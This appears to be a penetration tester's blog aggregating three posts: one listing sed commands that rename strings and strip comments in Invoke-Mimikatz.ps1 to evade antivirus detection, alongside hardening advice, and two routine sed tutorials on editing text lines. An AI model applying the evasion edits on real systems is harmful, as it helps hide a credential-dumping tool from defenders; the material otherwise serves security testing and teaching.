In this post I will be talking about avoiding AV detection when running mimikatz with sed! I came across this on the BlackHills Information Security Website, link here. Props to Carrie Roberts for sharing this. The classic Invoke-Mimikatz.ps1 from the PowerSploit suite located here, does get detected by many Anti-Virus vendors. This really is a great for the Enterprise. However whats not so great is the way in which AV vendors are detecting it and how it can be easily bypassed! Yes AV can easily be bypassed by modifying the powershell file. Using ‘sed’ in bash we can swap out various text in the ps1 file. For example swapping out mimikatz for mimidogz as in line 1 below.
I have talked about slowing down attackers who are using mimikatz in this post. This is where we can deny access to the clear text credentials in early versions of Windows (up to windows 7). In later versions of windows (8 and above) we can deny access to the hash and the clear text credentials. This will only slow attackers down though as the OS can be modified, however this will make noise on the network. This is really is a must for slowing down attackers. Harden your systems!
Below are the sed commands:
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
How do we remove specific text from each line in a text file in Linux? In this post we cover using Sed to remove text from a line in Linux.
We previously covered in this post adding text to a line in Linux. In this post we will be specifically talking about the opposite. Using Sed to remove text from a line in linux is fairly straight forward. To remove specific characters or portion of text from a line in Linux we can use command line bash tool sed. The tool sed is used to perform basic text transformations, more info on sed can be found here. In the below example we want to specifically remove ‘BARRY\’ from a line everything within the square brackets [text to remove] is removed, so we use:
cat users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'
Hopefully you will find this useful!
Using sed to add text to the end of each line in Linux.
In this example we are going to use sed to add text to the end of each line in Linux. More specifically in a text file in Linux using a bash one liner! Why would we want to do this? Multiple reasons if your penetration tester. Creating user name lists or adding ports to the end of IP addresses for example. Sed is used to perform basic text transformations you can read more about it here.
So for example if we wanted to add ‘:80’ to the end of each line for a list of IP address we would do the following:
sed ‘s/$/:80/’ IP.txt > new_IP.txt
~$sed 's/$/:80/' IP.txt > new_IP.txt
Or if we found we wanted to add ‘adm’ to the end of each line in a list of user names we would also use sed.
~$sed 's/$/adm/' admins.txt > new_admins.txt
Having these small bash commands to hand is super useful. As a penetration tester I am always find that I need to script something in Bash or PowerShell or needing to produce one liners. Having these commands to ready and waiting saves time looking them up. Hopefully you will also find them useful. Don’t forget the man pages for bash commands. Practice, practice and more practice.